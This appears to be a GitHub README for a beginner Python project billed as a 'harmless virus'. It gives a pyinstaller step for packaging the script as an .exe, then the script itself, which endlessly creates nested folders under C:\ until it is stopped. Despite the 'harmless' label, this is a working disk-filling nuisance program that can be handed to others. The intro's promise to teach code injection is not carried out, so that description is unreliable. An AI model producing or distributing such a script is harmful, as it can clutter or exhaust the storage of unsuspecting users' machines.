In this Project, I will show you how to create a harmless computer virus using Python programming language. This is a beginner-friendly project that will guide you through the process of creating a virus that doesn't cause any harm to your computer but can be a great learning experience. I will cover the basics of Python programming, as well as virus programming concepts such as file manipulation and code injection. Follow along with our step-by-step instructions and create your own virus today! let's start...............
To make this project you need to follow this step:-
Install package with pip
pip install pyinstaller
# If you want ot convert this code PY file to exe file then need to install this module.
To deploy this project run
# Please Subscribe my youtube channel "Problem Solve with Ridoy"
import os
path = "C:\\"
os.makedirs(f"{path}dont delete")
count = 0
while True:
os.makedirs(f"{path}dont delete\\{count}")
count += 1
print("folder creating")
Facebook:- https://www.facebook.com/problemsolvewithridoy/
Linkedin:- https://www.linkedin.com/in/ridoyhossain/
YouTube:- https://www.youtube.com/@problemsolvewithridoy
Gmail:- entridoy2@gmail.com
If you have any confusion, please feel free to contact me. Thank you
This script is released under the MIT License. Feel free to use, modify, and distribute it as you wish. If you find any bugs or have any suggestions for improvement, please submit an issue or a pull request on this repository.